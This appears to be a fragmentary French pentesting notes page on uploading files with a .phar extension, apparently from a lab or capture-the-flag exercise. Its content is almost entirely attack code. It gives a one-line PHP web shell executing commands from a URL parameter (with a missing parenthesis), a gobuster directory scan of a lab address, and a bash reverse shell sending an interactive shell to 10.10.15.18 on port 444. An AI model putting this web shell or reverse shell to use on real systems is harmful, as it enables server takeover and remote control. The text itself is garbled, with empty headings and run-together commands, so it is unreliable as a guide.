File Upload (.phar extension) - Pentesting Web

Exploitation initiale:


Modification de l'extension PHP :


Fichier non interpreter:



Mis à jour








Mis à jour
<?php
system($_GET['cmd'];
?>gobuster dir -u http://10.10.11.241:8080/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20/usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.18/444 0>&1'